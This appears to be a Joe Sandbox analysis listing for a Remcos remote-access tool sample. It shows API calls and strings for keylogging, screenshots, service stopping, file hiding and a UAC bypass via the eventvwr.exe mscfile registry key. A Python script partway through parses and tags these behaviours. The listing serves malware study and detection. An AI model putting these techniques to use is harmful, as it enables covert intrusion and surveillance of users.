                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 65535$udp
                                                                                          • API String ID: 0-1267037602
                                                                                          • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                          • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                                                                          • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                          • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                                          • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                                                                          • GetForegroundWindow.USER32 ref: 00409C92
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                                          • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                          • API String ID: 911427763-3954389425
                                                                                          • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                                                                          • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                                          • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                                                                          • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                          • API String ID: 82841172-425784914
                                                                                          • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                                                                          • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                                                                          • Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
                                                                                          • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                                          • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                                          • __dosmaperr.LIBCMT ref: 00438646
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                                          • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                                          • __dosmaperr.LIBCMT ref: 00438683
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                                          • __dosmaperr.LIBCMT ref: 004386D7
                                                                                          • _free.LIBCMT ref: 004386E3
                                                                                          • _free.LIBCMT ref: 004386EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                          • String ID:
                                                                                          • API String ID: 2441525078-0
                                                                                          • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                                                                          • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                                                                          • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                                                                          • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: pF$tF
                                                                                          • API String ID: 269201875-2954683558
                                                                                          • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                                                          • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                                                                          • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                                                                          • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 0040549F
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                                                                          • TranslateMessage.USER32(?), ref: 0040555E
                                                                                          • DispatchMessageA.USER32(?), ref: 00405569
                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                          • API String ID: 2956720200-749203953
                                                                                          • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                                                                                          • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                                                                          • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                                                                                          • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                                                                          APIs
                                                                                            • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00416123
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                          • String ID: <$@$@%G$@%G$Temp
                                                                                          • API String ID: 1704390241-4139030828
                                                                                          • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                                                                          • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                                                                          • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                                                                          • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                                                                          • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                                                                          • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                                                                          • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00445645
                                                                                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                          • _free.LIBCMT ref: 00445651
                                                                                          • _free.LIBCMT ref: 0044565C
                                                                                          • _free.LIBCMT ref: 00445667
                                                                                          • _free.LIBCMT ref: 00445672
                                                                                          • _free.LIBCMT ref: 0044567D
                                                                                          • _free.LIBCMT ref: 00445688
                                                                                          • _free.LIBCMT ref: 00445693
                                                                                          • _free.LIBCMT ref: 0044569E
                                                                                          • _free.LIBCMT ref: 004456AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                          • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                                                                          • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                                                                          • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00417F6F
                                                                                          • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                                                                          • Sleep.KERNEL32(000003E8), ref: 004180B3
                                                                                          • GetLocalTime.KERNEL32(?), ref: 004180BB
                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                          • API String ID: 489098229-3790400642
                                                                                          • Opcode ID: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
                                                                                          • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                                                                          • Opcode Fuzzy Hash: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
                                                                                          • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00001388), ref: 00409738
                                                                                            • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                            • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                            • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                            • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                          • String ID: H"G$H"G
                                                                                          • API String ID: 3795512280-1424798214
                                                                                          • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                                                                                          • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                                                                          • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                                                                                          • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodePointer
                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                          • API String ID: 3527080286-3064271455
                                                                                          • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                          • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                                                                          • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                          • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                          • API String ID: 1462127192-2001430897
                                                                                          • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                                                                          • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                                                                          • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                                                                          • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                                          • ExitProcess.KERNEL32 ref: 00406782
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteExitProcessShell
                                                                                          • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                          • API String ID: 1124553745-1488154373
                                                                                          • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                                          • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                                                                          • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                                          • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
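The function blocks above are easier to triage when the `APIs` and `String ID` lines are parsed rather than read raw: the service-control function at 00418AD2..00418B19 (OpenSCManagerW, OpenServiceW, ControlService with control code 1), the ShellExecuteW function that runs `dxdiag /t` into a sysinfo.txt under the temp directory, the SetFileAttributesW calls at 0040979C and 0040991F, and the ShellExecuteW function whose strings are `Software\Classes\mscfile\shell\open\command` and `eventvwr.exe` (the Event Viewer handler hijack used as a UAC bypass). The Python helper below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It assumes only the line format the report itself prints (bullet, `Api.MODULE(args), ref: address`, optional `Part of subcall function` prefix, `$`-separated string IDs); the constants it decodes (SERVICE_CONTROL_STOP = 1, FILE_ATTRIBUTE_NORMAL = 0x80, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM = 0x6, Sleep in milliseconds) are documented Win32 values, and the sample blocks are copied from the listing above. The tags it emits are triage hints that encode the analyst's reading of those blocks, not detection signatures.

```python
"""Triage helper for the per-function "APIs" / "String ID" lines of a Joe Sandbox
function listing.  Added example for this report, not Joe Sandbox's own code."""
import re
from dataclasses import dataclass
from typing import Optional

# "• Api.MODULE(arg,arg,...), ref: 00401234"  or  "• Api.MODULE ref: 00401234",
# optionally prefixed with "Part of subcall function 0040ABCD:".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_LINE = re.compile(r"^\s*•?\s*String ID:\s*(?P<ids>.*?)\s*$")

# (api, zero-based argument index) -> symbolic names for documented Win32 values.
DECODERS = {
    ("ControlService", 1): {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                            3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"},
    ("SetFileAttributesW", 1): {0x80: "FILE_ATTRIBUTE_NORMAL",
                                0x06: "FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # parent function when the report marks it as a subcall

    def decoded(self):
        """Arguments with known hex constants replaced by their symbolic meaning."""
        out = []
        for i, a in enumerate(self.args):
            is_hex = re.fullmatch(r"[0-9A-Fa-f]{8}", a) is not None
            names = DECODERS.get((self.api, i))
            if is_hex and names:
                out.append(names.get(int(a, 16), a))
            elif is_hex and self.api == "Sleep" and i == 0:
                out.append(f"{int(a, 16)} ms")
            else:
                out.append(a)
        return out


def parse_function_block(lines):
    """Split one function block into (list of ApiCall, list of string IDs)."""
    calls, strings = [], []
    for line in lines:
        m = API_LINE.match(line)
        if m:
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["parent"]))
            continue
        s = STRING_LINE.match(line)
        if s:
            strings.extend(x for x in s["ids"].split("$") if x)
    return calls, strings


def tag_behaviour(calls, strings):
    """Triage tags for one block, each justified by the calls and strings present."""
    apis = {c.api for c in calls}
    text = "\n".join(strings)
    tags = []
    if "ShellExecuteW" in apis and "mscfile\\shell\\open\\command" in text and "eventvwr.exe" in text:
        tags.append("UAC bypass: mscfile handler hijack launched through eventvwr.exe")
    if "ShellExecuteW" in apis and "dxdiag" in strings and "sysinfo.txt" in text:
        tags.append("host recon: dxdiag /t written to sysinfo.txt under the temp directory")
    for c in calls:
        d = c.decoded()
        if c.api == "ControlService" and len(d) > 1 and d[1] == "SERVICE_CONTROL_STOP":
            tags.append(f"service tampering: ControlService(SERVICE_CONTROL_STOP) at {c.ref}")
        if c.api == "SetFileAttributesW" and len(d) > 1 and "HIDDEN" in d[1]:
            tags.append(f"hides a file: SetFileAttributesW({d[1]}) at {c.ref}")
    return tags


# Sample blocks copied from this report's listing (constructed test input).
SERVICE_BLOCK = r"""
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
• String ID:
""".splitlines()
EVENTVWR_BLOCK = r"""
• ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
• ExitProcess.KERNEL32 ref: 00406782
• String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
""".splitlines()
DXDIAG_BLOCK = r"""
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
• Sleep.KERNEL32(00000064), ref: 00415A46
• DeleteFileW.KERNEL32(00000000), ref: 00415A7A
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
""".splitlines()
HIDE_BLOCK = r"""
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
""".splitlines()

if __name__ == "__main__":
    for name, block in [("service", SERVICE_BLOCK), ("eventvwr", EVENTVWR_BLOCK),
                        ("dxdiag", DXDIAG_BLOCK), ("hide", HIDE_BLOCK)]:
        calls, strings = parse_function_block(block)
        print(name, tag_behaviour(calls, strings))
```

Feed it the `APIs` and `String ID` lines of any block in the listing; calls made inside a subcall keep the parent address in `subcall_of`, so a tag can be traced back to the function the report attributes it to.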
                                                                                          APIs
                                                                                          • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocConsoleShowWindow
                                                                                          • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                                          • API String ID: 4118500197-4025029772
                                                                                          • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                          • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                                                                          • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                          • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                                            • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                            • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                            • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                                          • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                                          • TranslateMessage.USER32(?), ref: 0041B29E
                                                                                          • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
